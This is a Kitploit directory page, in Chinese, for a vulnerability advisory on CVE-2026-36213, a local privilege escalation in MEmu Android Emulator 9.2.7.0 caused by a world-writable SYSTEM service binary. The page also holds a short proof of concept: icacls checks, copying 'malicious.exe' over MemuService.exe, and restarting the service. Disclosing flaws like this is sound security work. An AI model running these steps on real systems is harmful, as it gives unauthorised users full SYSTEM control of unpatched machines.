Skip to content
KitploitKITPLOIT
工具博客
提交
工具博客
提交

黑客、渗透测试和网络安全工具,武装您的安全武器库!

Kitploit 是一个黑客、网络安全和渗透测试工具的目录。发现最新的项目更新,查找漏洞、分析系统、自动化测试并加强你的安全。

··订阅源·联系·隐私·© 2026 Kitploit

工具目录

分类

查看所有分类
Loading categories
CVE-2026-36213 — CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2 | Kitploit
工具/GitHubGitHub/sec-zone/cve-2026-36213
Privilege EscalationVulnerability AnalysisExploitationPenetration TestingLearning & EducationBinary Exploitation
GitHubsec-zone/cve-2026-36213

CVE-2026-36213

CVE-2026-36213 | Local Privilege Escalation in MEmu Android Emulator 9.2.7.0 via Insecure Service Binary Permissions | Patched in 9.3.2

查看仓库
512个月前尚未审核

最受欢迎

查看全部 →

发现我们社区最常用的工具。

探索所有工具

浏览我们的工具集合

查看所有工具 →
分享

CVE-2026-36213

CVE-2026-36213 | 通过不安全的服务二进制权限在 MEmu Android Emulator 9.2.7.0 中实现本地权限提升 | 已在 9.3.2 中修复

CVE-2026-36213 — MEmu Android Emulator 9.2.7.0 LPE

CVE CVSS Status Platform

摘要

MEmu Android Emulator 9.2.7.0 中存在本地权限提升 (LPE) 漏洞。
服务 MEmuSVC 以 NT AUTHORITY\SYSTEM 权限运行,但其二进制文件可被任何本地用户写入,从而导致完全系统沦陷。

字段详情
CVECVE-2026-36213
产品MEmu Android Emulator (MicroVirt)
受影响版本9.2.7.0 及更早版本
修复版本9.3.2
CWECWE-732 / CWE-269
CVSS v3.17.8 HIGH AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
ATT&CKT1574.010

漏洞详情

MEmuService.exe 被安装为 SYSTEM 级别的 Windows 服务,且具有不安全的 NTFS 权限:

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

BUILTIN\Users:(F)   ← 任何本地用户拥有完全控制权
Everyone:(F)        ← 全局可写二进制文件

概念验证

:: 步骤1 - 检查易受攻击的权限

root@kitploit:~
icacls "C:\Program Files\Microvirt\MEmu\MemuService.exe"

:: 步骤2 - 替换二进制文件(以低权限用户身份)

root@kitploit:~
copy malicious.exe "C:\Program Files\Microvirt\MEmu\MemuService.exe" /Y

:: 步骤3 - 重启服务

root@kitploit:~
sc stop MEmuSVC && sc start MEmuSVC

:: 结果:malicious.exe 以 NT AUTHORITY\SYSTEM 权限运行

检测脚本

可用地址:https://github.com/sec-zone/Hijack-service-binaries

免责声明

本研究仅供教育目的,并遵循负责任披露政策。
作者不对任何滥用此信息的行为负责。

研究人员

姓名:Mohammad Hossein Ashofte Yazdi
领英:https://www.linkedin.com/in/seczone64
推特:@sec_zone64
邮箱:[email protected]

下载工具